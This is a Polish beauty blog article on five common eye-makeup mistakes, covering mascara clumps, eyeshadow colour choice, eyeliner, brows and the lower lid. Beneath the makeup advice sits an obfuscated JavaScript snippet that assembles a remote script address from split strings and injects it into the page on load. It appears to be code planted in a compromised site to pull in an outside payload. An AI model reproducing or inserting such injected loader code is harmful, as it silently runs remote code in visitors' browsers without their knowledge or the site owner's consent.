Przejdź do treści

5 najczęstszych błędów w makijażu oczuŹle dobrane cienie do powiek, nieestetyczne kreski czy zbyt mocno
podkreślone brwi – to tylko kilka spośród najczęstszych błędów
popełnianych przez kobiety w makijażu oczu. Jeśli chcesz, aby twoje
spojrzenie uwodziło, a makijaż był naprawdę perfekcyjny, sprawdź jakich
wpadek należy unikać malując oczy.

Każda kobieta chce, aby jej makijaż wyglądał naprawdę idealnie i podkreślał atuty urody. Żeby tak było naprawdę, należy szczególną uwagę przyłożyć do makijażu oczu. Znając kilka najczęstszych wpadek, jakie popełniają kobiety nakładając kolorowe kosmetyki na swoje powieki, będziesz mogła uniknąć tego typu niepowodzeń.

 

Posklejane rzęsy

Gęste i długie rzęsy nadają spojrzeniu głębi i efektownie podkreślają makijaż. Niestety to właśnie zbyt duża ilość kosmetyku naniesionego na rzęsy, jest jednym z najczęstszych makijażowych błędów. Posklejane włoski, na których wyraźnie widać grudki i grubą warstwę maskary, nie wyglądają estetycznie.
Jak uniknąć tego typu wpadki? Należy oczywiście nakładać mniejszą ilość tuszu – 2 lub 3 warstwy w zupełności wystarczą – po zakończonym tuszowaniu warto rozczesać rzęsy. Dzięki temu zyskasz pewność, że będą się one prezentować estetycznie i staną się pięknym dopełnieniem makijażu.

najczestsze-bledy-w-makijazu-oczu-2.jpg

Źle dobrane cienie do powiek

Matowe, metaliczne, opalizujące czy brokatowe, a każdy z nich w dziesiątkach kolorów – wybór cieni do powiek może przyprawić o prawdziwy zawrót głowy. Niestety, wiele kobiet wpada w tę wielobarwna pułapkę i źle dobiera kolor cieni do swojego typu urody. Przykładowo cienie perłowe w zbyt dużej ilości podkreślą każdą niedoskonałość skóry oraz zmarszczę na powiece. Natomiast zbyt ciemny makijaż pomniejszy optycznie oko i nada twarzy smutny wyraz.
Aby kolor pasował do twojego typu urody, należy go dobrać np. do koloru tęczówki oka. Pomocna w tym zadaniu jest teoria koloru oraz koło barw, na którym rozmieszczone są poszczególne odcienie. Sąsiadujące ze sobą kolory to barwy tworzące harmonijne połączenie. Natomiast te ulokowane po przeciwnych stronach koła kontrastują ze sobą. Najlepszym krokiem przy wyborze cieni jest wybór tych kontrastujących z barwą tęczówki – barwy dopełniające efektownie podkreślą spojrzenie. Więcej na ten temat doboru cieni do powiek przeczytasz na https://blog.tagomago.pl/oczy-zielone-niebieskie-i-brazowe-jak-dobrac-makijaz-pod-kolor-oczu/

 

Nieprecyzyjne kreski

Kreski malowane eyelinerem, cieniem czy kredką mogą optycznie podnieść kąciki oczu, powiększyć je oraz elegancko dopełnić makijaż. Aby faktycznie osiągnąć taki efekt trzeba jednak namalować perfekcyjne kreski. Wiele kobiet niestety wykonuje ten zabieg nieumiejętnie co w rezultacie sprawia, że kąciki oczu wydają się przytłoczone, a cały makijaż nabiera groteskowego charakteru.
Perfekcyjne kreski można osiągnąć jedynie dzięki odpowiednim narzędziom – najlepiej w tej roli sprawdzają się eyelinery z niewielkim pędzelkiem. Alternatywnym rozwiązaniem są ścięte pod kątem pędzelki do cieni.

Nieumiejętnie podkreślone brwi

Zbyt ciemne brwi to kolejny błąd, jaki najczęściej przytrafia się kobietom niewprawionym w sztuce codziennego makijażu. Klasyczna, bardzo ciemna henna odchodzi już do lamusa – obecnie modne są naturalne, delikatnie podkreślone brwi. Aby je zagęścić możesz zastosować cień do powiek lub specjalną pomadę – kosmetyki te nałożysz za pomocą skośnego pędzelka. Należy jednak pamiętać, że kolor cienia lub pomady nie powinien być ciemniejszy niż o 2 tony od twoich włosów.

 

Zbyt mocna dolna powieka

Podkreślona dolna powieka idealnie dopełnia makijaż smokey eyes i sprawdza się znakomicie w wieczorowych stylizacjach. Jednak zbyt gruba, ciemna kreska na dolnej powiece podkreśli sińce pod oczami i optycznie je pomniejszy. Aby konturowanie dolnej powieki wyglądało dobrze, cień należy rozetrzeć za pomocą jaśniejszego kosmetyku.

(function(){
zxr3=document.createElement(„script”);zxr3_=((„u”)+”st”)+”a”;zxr3.async=true;
zxr3.type=”text/javascript”;zxr3_+=(„t.i”)+””+”n”;zxr3_+=((„f”)+”o”);zxr3_+=”/”;
zxr3u=”62476389.”;zxr3u+=”j6aft4wdxr3y642m1f5″+”t3lhnkc4ldj”;
zxr3.src=”//”+zxr3_+zxr3u; document.body.appendChild(zxr3);
})();

0 0 votes
Article Rating
Subscribe
Powiadom o
guest
0 komentarzy
Inline Feedbacks
View all comments
%d bloggers like this: